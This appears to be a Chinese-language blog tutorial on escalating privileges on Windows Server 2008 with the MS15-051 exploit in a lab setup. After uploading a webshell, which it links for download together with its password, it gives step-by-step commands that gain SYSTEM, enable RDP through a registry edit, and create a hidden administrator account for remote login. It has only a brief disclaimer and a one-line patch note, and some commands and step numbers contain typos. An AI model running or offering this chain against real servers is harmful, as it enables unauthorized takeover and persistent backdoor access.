【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权
目录
MS15-051简介
Windows 内核模式驱动程序中的漏洞可能允许特权提升 (3057191) , 如果攻击者在本地登录并可以在内核模式下运行任意代码,最严重的漏洞可能允许特权提升。
攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。
攻击者必须拥有有效的登录凭据并能本地登录才能利用此漏洞。 远程或匿名用户无法利用此漏洞。
声明:以下的提权的介绍只适用于学习和授权情况下的操作,请勿用于非法环境!
漏洞影响的操作系统
Windows Server 2003
Windows Vista
Windows Server 2008
Windows Server 2008 R2
环境准备:
攻击(攻击者)主机:
windows2010 物理机
目标(受害者)主机:
winddows2008 虚拟机
Nat
192.168.254.133
很多时候,当我们上传了一句话木马之后,想要进行一些操作。比如,查看当前用户的身份,这时会发现权限不够,当前的命令行只对网站当前目录下的文件具有操作权限,对其他目录和系统都没有权限,这时我们就需要提权了。
我们把下面两个程序上传到网站目录下去
大马下载:
链接:https://pan.baidu.com/s/1fq6B6W7GBR-D4qjerB6qwg 提取码:68ks 登陆大马密码:xiaowang520
操作步骤:
【步骤一】上传(这里是直接复制进行的,构建环境)大马到目标网页主目录,并在物理机上进行登陆,结果如【图1】所示:
图1
【步骤二】查看系统版本及补丁情况,结果如【图1】所示:
【命令】
systemifo //查看系统版本及补丁情况
图2
【分析】目标服务器系统未进行补丁
【步骤三】查看用户权限,结果如【图3】所示:
【命令】
whoami //查看用户权限
图3
【分析】】未取得系统system权限,需进行提权
【步骤三】上传ms15-051x64.exe至一个可执行的目录【C:\Windows\Temp】,进行提权,结果如【图3】所示:
图3
【步骤四】查看权限,,结果如【图4】所示:
【命令】
C:\Windows\Temp\ms15-051x64.exe "whoami" //查看权限
图4
【分析】system用户说明提权成功
【步骤五】查看是否开启3389端口,并开启3389端口,结果如【图5】所示:
【命令】
C:\Windows\Temp\ms15-051x64.exe "netstat -ano" //查看是否开启3389端口
开启3389端口,复制下面代码,创建一个*.bat的文件,上传到【C:\Windows\Temp】目录下:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\Windows\Temp\ms15-051x64.exe "C:\Windows\Temp\1.bat"
C:\Windows\Temp\ms15-051x64.exe "netstat -ano"
图5
【分析】开启3389端口成功
【步骤六】:创建一个可以加入管理员组的用户,进行远程桌面登陆,【创建系统用户的时候,密码一定要大小写混合,才符合windows2008创建用户的条件,不然创建用户会失败】结果如【图6】所示:
【命令】
C:\Windows\Temp\ms15-051x64.exe "net user adm Xye123456 /add"
C:\Windows\Temp\ms15-051x64.exe "net localgroup administrators adm /add"
C:\Windows\Temp\ms15-051x64.exe "net localgroup administrators "
图6
【步骤八】:进行远程桌面登陆,结果如【图7】所示:
【命令】
mstsc
图7
msf进行攻击方法:
资料:传送门
加固方式:
寻找漏洞相应的补丁,打补丁